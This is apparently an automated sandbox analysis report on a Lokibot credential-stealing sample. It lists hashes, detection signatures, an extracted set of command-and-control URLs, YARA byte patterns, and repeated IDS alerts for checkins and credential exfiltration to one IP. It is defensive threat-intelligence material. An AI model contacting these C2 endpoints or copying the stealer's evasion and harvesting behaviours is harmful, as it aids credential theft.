Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Conan Fegan - Aluminium.exe

Overview

General Information

Sample Name:Conan Fegan - Aluminium.exe
Analysis ID:356211
MD5:708ee64939578fbb07010e20f6c7672c
SHA1:335dc9a9142b528848b8446be2afda844f6d673f
SHA256:f1a43d8b49bda3c88eb1c314c9460a92c0b467ea8db4c9086ac8e3bfe358e511
Tags:Loki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • Conan Fegan - Aluminium.exe (PID: 4748 cmdline: 'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe' MD5: 708EE64939578FBB07010E20F6C7672C)
    • Conan Fegan - Aluminium.exe (PID: 7008 cmdline: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe MD5: 708EE64939578FBB07010E20F6C7672C)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://www.ritcophysiotherapy.com.au/wap121/five/fre.php"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x1d6f8f:$des3: 68 03 66 00 00
            • 0x1db380:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x1db44c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackLoki_1Loki Payloadkevoreilly
                  • 0xa3864:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                  • 0xa3aac:$a2: last_compatible_version
                  0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                  • 0xa2aaf:$des3: 68 03 66 00 00
                  • 0xa6ea0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                  • 0xa6f6c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                  Click to see the 30 entries

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: Conan Fegan - Aluminium.exeAvira: detected
                  Found malware configurationShow sources
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://www.ritcophysiotherapy.com.au/wap121/five/fre.php"]}
                  Machine Learning detection for sampleShow sources
                  Source: Conan Fegan - Aluminium.exeJoe Sandbox ML: detected

                  Compliance:

                  barindex
                  Uses 32bit PE filesShow sources
                  Source: Conan Fegan - Aluminium.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                  Source: Conan Fegan - Aluminium.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_07A3DE28
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 4x nop then jmp 07A3C2B3h0_2_07A3C1FF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_07A3DF24

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49745 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49747 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49747 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49747 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49751 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49751 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49751 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49752 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49753 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49753 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49753 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49754 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49754 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49754 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49755 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49755 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49755 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49756 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49757 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49760 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49760 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49760 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49763 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49763 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49763 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49764 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49764 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49764 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49765 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49769 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49769 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49769 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49770 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49770 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49770 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49771 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49771 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49771 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49772 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49772 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49772 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49773 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49773 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49773 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49774 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49774 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49774 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49777 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49777 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49777 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49781 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49781 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49781 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49784 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49784 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49784 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49788 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49788 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49788 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49790 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49790 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49790 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49792 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49792 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49792 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49793 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49793 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49793 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49794 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49794 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49794 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49795 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49795 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49795 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49796 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49796 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49796 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49797 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49797 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49797 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49798 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49798 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49798 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49799 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49799 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49799 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49800 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49800 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49800 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49804 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49804 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49804 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49805 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49811 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49811 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49811 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49812 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49812 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49812 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49813 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49813 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49813 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49814 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49814 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49814 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49815 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49815 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49815 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49816 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49816 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49816 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49817 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49817 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49817 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49818 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49818 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49818 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49819 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49819 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49819 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49820 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49820 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49820 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49821 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49821 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49821 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49822 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49822 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49822 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49823 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49823 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49823 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49824 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 203.170.84.89:80
